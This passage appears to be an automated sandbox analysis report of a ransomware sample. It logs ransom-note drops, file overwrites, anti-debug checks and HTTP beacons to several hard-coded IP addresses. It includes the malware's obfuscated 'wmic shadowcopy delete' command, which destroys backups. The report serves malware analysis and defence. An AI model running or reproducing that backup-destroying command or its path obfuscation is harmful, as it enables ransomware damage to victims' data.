Read C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim size = 1048576, size_out = 393234 True 1
Read C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim size = 1048576, size_out = 0 True 1
Write C:\\DECRYPT-FILES.html size = 6586 True 1
Write C:\$Recycle.Bin\\DECRYPT-FILES.html size = 6586 True 1
Write C:\$Recycle.Bin\S-1-5-21-3388679973-3930757225-3770151564-1000\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Boot\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Boot\BOOTSTAT.DAT size = 264 True 1
Write C:\Boot\cs-CZ\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Boot\da-DK\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Boot\de-DE\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Boot\el-GR\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Boot\en-US\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Boot\es-ES\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Boot\fi-FI\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Boot\Fonts\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Boot\fr-FR\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Boot\hu-HU\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Boot\it-IT\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Boot\ja-JP\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Boot\ko-KR\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Boot\nb-NO\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Boot\nl-NL\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Boot\pl-PL\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Boot\pt-BR\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Boot\pt-PT\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Boot\ru-RU\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Boot\sv-SE\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Boot\tr-TR\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Boot\zh-CN\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Boot\zh-HK\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Boot\zh-TW\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Config.Msi\\DECRYPT-FILES.html size = 6586 True 1
Write C:\Documents and Settings\\DECRYPT-FILES.html size = 6586 True 1
Write C:\MSOCache\\DECRYPT-FILES.html size = 6586 True 1
Write C:\PerfLogs\\DECRYPT-FILES.html size = 6586 True 1
Write C:\PerfLogs\Admin\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Recovery\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi size = 264 True 1
Fn
Data
Write C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim size = 1048576 True 161
Fn
Data
Write C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim size = 393234 True 1
Fn
Write C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim size = 264 True 1
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\\DECRYPT-FILES.html size = 6586 True 1
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\\DECRYPT-FILES.html size = 6586 True 1
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\\DECRYPT-FILES.html size = 6586 True 1
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\\DECRYPT-FILES.html size = 6586 True 1
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\\DECRYPT-FILES.html size = 6586 True 1
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\\DECRYPT-FILES.html size = 6586 True 1
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst size = 264 True 1
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst size = 264 True 1
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\\DECRYPT-FILES.html size = 6586 True 1
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst size = 264 True 1
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents size = 264 True 1
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin size = 264 True 1
Fn
Registry (2)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductName, data = 87 True 1
Fn
Process (54)
»
Operation Process Additional Information Success Count Logfile
Create C:\m\..\Windows\ovxhp\sff\qyv\..\..\..\system32\w\sfc\roma\..\..\..\wbem\ux\dgfg\..\..\wmic.exe os_pid = 0xa78, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Enumerate Processes - - True 52
Fn
Enumerate Processes - - False 1
Fn
Module (63)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 39
Fn
Get Handle c:\windows\syswow64\advapi32.dll base_address = 0x74d40000 True 2
Fn
Get Handle c:\windows\syswow64\ole32.dll base_address = 0x755e0000 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Wow64DisableWow64FsRedirection, address_out = 0x76c4d650 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Wow64RevertWow64FsRedirection, address_out = 0x76c4d668 True 1
Fn
Create Mapping C:\Boot\BCD.LOG1 filename = C:\Boot\BCD.LOG1, protection = PAGE_READWRITE, maximum_size = 0 False 1
Fn
Create Mapping C:\Boot\BCD.LOG2 filename = C:\Boot\BCD.LOG2, protection = PAGE_READWRITE, maximum_size = 0 False 1
Fn
Create Mapping C:\Boot\BOOTSTAT.DAT filename = C:\Boot\BOOTSTAT.DAT, protection = PAGE_READWRITE, maximum_size = 0 True 1
Fn
Create Mapping C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi, protection = PAGE_READWRITE, maximum_size = 0 True 1
Fn
Create Mapping C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst, protection = PAGE_READWRITE, maximum_size = 0 True 1
Fn
Create Mapping C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst, protection = PAGE_READWRITE, maximum_size = 0 True 1
Fn
Create Mapping C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst, protection = PAGE_READWRITE, maximum_size = 0 True 1
Fn
Create Mapping C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents, protection = PAGE_READWRITE, maximum_size = 0 True 1
Fn
Create Mapping C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin, protection = PAGE_READWRITE, maximum_size = 0 True 1
Fn
Map C:\Boot\BOOTSTAT.DAT process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe, desired_access = FILE_MAP_WRITE True 1
Fn
Map C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe, desired_access = FILE_MAP_WRITE True 1
Fn
Map C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe, desired_access = FILE_MAP_WRITE True 1
Fn
Map C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe, desired_access = FILE_MAP_WRITE True 1
Fn
Map C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe, desired_access = FILE_MAP_WRITE True 1
Fn
Map C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe, desired_access = FILE_MAP_WRITE True 1
Fn
Map C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe, desired_access = FILE_MAP_WRITE True 1
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create kfw96 9 5 class_name = kfw96 9 5, wndproc_parameter = 0 True 1
Fn
System (39)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XDUWTFONO True 1
Fn
Sleep duration = 1000 milliseconds (1.000 seconds) True 17
Fn
Sleep duration = -1 (infinite) False 1
Fn
Get Time type = Ticks, time = 118077 True 1
Fn
Get Time type = Ticks, time = 118139 True 1
Fn
Get Time type = Ticks, time = 118155 True 3
Fn
Get Time type = Ticks, time = 118825 True 1
Fn
Get Time type = Ticks, time = 118997 True 2
Fn
Get Time type = Ticks, time = 119200 True 2
Fn
Get Time type = Ticks, time = 119481 True 1
Fn
Get Time type = Ticks, time = 121602 True 1
Fn
Get Time type = Ticks, time = 134363 True 1
Fn
Get Time type = Ticks, time = 134738 True 1
Fn
Get Time type = Ticks, time = 134878 True 1
Fn
Get Time type = Ticks, time = 134925 True 1
Fn
Get Time type = Ticks, time = 135034 True 1
Fn
Get Time type = Ticks, time = 135112 True 1
Fn
Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Mutex (1)
»
Operation Additional Information Success Count Logfile
Create mutex_name = 9cda09f29c354b42 True 1
Fn
Debug (50)
»
Operation Process Additional Information Success Count Logfile
Check for Presence c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe - True 50
Fn
Network Behavior
TCP Sessions (1)
»
Information Value
Total Data Sent 0 bytes
Total Data Received 0 bytes
Contacted Host Count 1
Contacted Hosts 92.63.37.100
TCP Session #1
»
Information Value
Remote Address 92.63.37.100
Remote Port 80
Local Address 192.168.0.176
Local Port 49160
Data Sent 0 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 92.63.37.100, remote_port = 80 True 1
Fn
Send flags = NO_FLAG_SET, size = 500, size_out = 500 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 117
Fn
Data
Receive flags = NO_FLAG_SET, size = 0, size_out = 0 True 1
Fn
Close type = SOCK_STREAM True 1
Fn
HTTP Sessions (3)
»
Information Value
Total Data Sent 1.49 KB
Total Data Received 2.40 KB
Contacted Host Count 3
Contacted Hosts 92.63.37.100, 92.63.32.2, 92.63.8.47
HTTP Session #1
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
Server Name 92.63.8.47
Server Port 80
Username -
Password -
Data Sent 512 bytes
Data Received 1.37 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko True 1
Fn
Open Connection protocol = http, server_name = 92.63.8.47, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /archive/fxc.action?sdp=q&g=6oix0&qbaa=6b&k=u7a7u True 1
Fn
Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko, Host: 92.63.8.47, Content-Type: application/x-www-form-urlencoded, Content-Length: 247, Connection: Keep-Alive, url = 92.63.8.47/archive/fxc.action?sdp=q&g=6oix0&qbaa=6b&k=u7a7u True 1
Fn
Data
Read Response size = 1, size_out = 1 True 160
Fn
Data
Read Response size = 1245, size_out = 1245 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #2
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
Server Name 92.63.32.2
Server Port 80
Username -
Password -
Data Sent 513 bytes
Data Received 349 bytes
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko True 1
Fn
Open Connection protocol = http, server_name = 92.63.32.2, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /tbrelgdfl.cgi?ah=wjfq2ey&j=23t84u4&ytxn=8kk6be554 True 1
Fn
Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko, Host: 92.63.32.2, Content-Type: application/x-www-form-urlencoded, Content-Length: 247, Connection: Keep-Alive, url = 92.63.32.2/tbrelgdfl.cgi?ah=wjfq2ey&j=23t84u4&ytxn=8kk6be554 True 1
Fn
Data
Read Response size = 1, size_out = 1 True 179
Fn
Data
Read Response size = 170, size_out = 170 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #3
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
Server Name 92.63.37.100
Server Port 80
Username -
Password -
Data Sent 500 bytes
Data Received 705 bytes
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 92.63.37.100, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /post/checkout/mkgqp.cgi?iii=8128v5, accept_types = 0 True 1
Fn
Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 92.63.37.100/post/checkout/mkgqp.cgi?iii=8128v5 False 1
Fn
Data
Process #2: svchost.exe
0 0
»
Information Value
ID #2
File Name c:\windows\system32\svchost.exe
Command Line C:\Windows\system32\svchost.exe -k netsvcs
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:37, Reason: RPC Server
Unmonitor End Time: 00:01:15, Reason: Terminated by Timeout
Monitor Duration 00:00:38
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x36c
Parent PID 0x1cc (c:\windows\system32\services.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
Process #4: wmic.exe
163 0
»
Information Value
ID #4
File Name c:\windows\system32\wbem\wmic.exe
Command Line "C:\m\..\Windows\ovxhp\sff\qyv\..\..\..\system32\w\sfc\roma\..\..\..\wbem\ux\dgfg\..\..\wmic.exe" shadowcopy delete
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:55, Reason: Child Process
Unmonitor End Time: 00:01:15, Reason: Terminated by Timeout
Monitor Duration 00:00:20
OS Process Information
»
Information Value
PID 0xa78
Parent PID 0xa38 (c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A7C
0x A98
0x AD8
0x ADC
0x AE0
0x AE4
Host Behavior
COM (6)
»
Operation Class Interface Additional Information Success Count Logfile
Create WBEMLocator IWbemLocator cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create F6D90F12-9C73-11D3-B32E-00C04F990BB4 2933BF95-7B36-11D2-B20E-00C04F983E60 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli\ms_409 True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\XDUWTFONO\ROOT\CIMV2 True 1
Fn
Execute WBEMLocator IWbemServices method_name = ExecQuery, query_language = WQL, query = SELECT * FROM Win32_ShadowCopy False 1
Fn
Registry (5)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging, data = 48 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory, data = 37 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Log File Max Size, data = 54 True 1
Fn
Module (3)
»
Operation Module Additional Information Success Count Logfile
Load C:\Windows\system32\kernel32.dll base_address = 0x76e30000 True 1
Fn
Get Handle c:\windows\system32\wbem\wmic.exe base_address = 0xff4a0000 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x76e46d40 True 1
Fn
System (7)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XDUWTFONO True 1
Fn
Get Time type = System Time, time = 2019-06-01 18:40:49 (UTC) True 1
Fn
Get Time type = Ticks, time = 119855 True 1
Fn
Get Time type = Performance Ctr, time = 17832216577 True 1
Fn
Get Time type = Local Time, time = 2019-06-02 04:40:51 (Local Time) True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 2
Fn
Process #5: wmiprvse.exe
0 0
»
Information Value
ID #5
File Name c:\windows\system32\wbem\wmiprvse.exe
Command Line C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:01, Reason: RPC Server
Unmonitor End Time: 00:01:15, Reason: Terminated by Timeout
Monitor Duration 00:00:14
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xae8
Parent PID 0x254 (c:\windows\system32\svchost.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\Network Service
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x AEC
0x AF0
0x AF4
0x AF8
0x AFC
0x B00
0x B04
Process #6: vssvc.exe
3 0
»
Information Value
ID #6
File Name c:\windows\system32\vssvc.exe
Command Line C:\Windows\system32\vssvc.exe
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:11, Reason: RPC Server
Unmonitor End Time: 00:01:15, Reason: Terminated by Timeout
Monitor Duration 00:00:04
OS Process Information
»
Information Value
PID 0xb08
Parent PID 0x1cc (c:\windows\system32\services.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x B20
0x B1C
0x B18
0x B14
0x B10
0x B0C
0x B28
0x B44
Host Behavior
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-06-01 18:41:02 (UTC) True 1
Fn
Get Time type = Ticks, time = 132632 True 1
Fn
Get Time type = Performance Ctr, time = 19328746087 True 1
Fn